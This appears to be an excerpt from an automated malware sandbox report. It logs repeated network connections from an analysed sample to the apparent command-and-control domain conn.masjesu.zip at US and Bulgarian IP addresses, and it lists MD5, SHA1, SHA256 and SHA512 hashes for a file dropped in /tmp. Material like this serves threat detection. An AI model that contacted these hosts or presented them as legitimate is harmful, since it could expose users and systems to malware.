US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp

Files

/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97